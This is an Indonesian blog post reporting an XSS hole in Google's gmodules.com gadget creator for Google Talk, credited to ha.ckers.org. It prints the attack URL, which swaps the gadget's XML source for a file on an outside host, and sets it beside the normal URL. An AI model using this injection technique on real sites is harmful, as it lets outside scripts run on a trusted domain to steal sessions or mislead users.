Lubang Di Apps Google (Google Talk)


iseng – iseng buka web http://ha.ckers.org/ eh ternyata mereka baru saja mendapat_kan lubang di aplikasi google (Google Talk). Teknik yang digunakan oleh mereka dengan menggunakan XSS (Cross Site Script). Mereka menggunakan script ini

http://gmodules.com/ig/creator?synd=open&url=http%3A//ha.ckers.org/asdf2.xml&pt=&context=b&synd=open&lang=en&.lang=en&country=us&.country=us&cat=all&num=24&start=0&cols=4&objs=w,mO,jyq,gQq,jhP,NL,Hg,pV,RB,p,33G,EKT,6aZ,7Wu,aag,2C,vB,sMg,j0,xQO,5WIK,Rm,gP1,acyU&sn=2C&lang=en

intinya, mereka hanya melakukan perubahan path xml google talk yang sebarusnya berada disini

http://gmodules.com/ig/creator?synd=open&url=http%3A//www.google.com/ig/modules/googletalk.xml&pt=%26context%3Db%26synd%3Dopen%26lang%3Den%26.lang%3Den%26country%3Dus%26.country%3Dus%26cat%3Dall%26num%3D24%26start%3D0%26cols%3D0%26objs%3D38Y%2COVJ%2Cw%2CuJc%2Cevi%2CRkR%2CzeO%2CKm2%2CKKO%2C6aZ%2CRB%2CqR%2C0sN%2Cghv%2Cn7a%2Czjd%2COC%2C9T%2CQLk%2Cad%2Ckg%2CpV%2CTWv%2C0zg&sn=RkR&lang=en

hingga penulis memposting tulisan ini, hole tersebut belum diperbaiki oleh pihak google. Apakah mereka tidak menggangap hal tersebut sebagai ancaman…kita tunggu saja, apa yang terjadi selanjutnya.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: